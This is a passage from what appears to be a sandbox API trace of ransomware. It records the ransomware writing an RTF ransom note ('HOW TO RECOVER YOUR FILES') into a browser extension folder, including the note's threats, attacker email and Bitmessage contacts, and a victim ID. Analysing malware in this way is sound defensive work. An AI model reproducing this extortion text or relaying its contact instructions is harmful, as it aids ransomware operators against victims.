\\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.562] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.563] CloseHandle (hObject=0x2f0) returned 1 [0286.563] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0286.563] GetLastError () returned 0x2 [0286.563] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 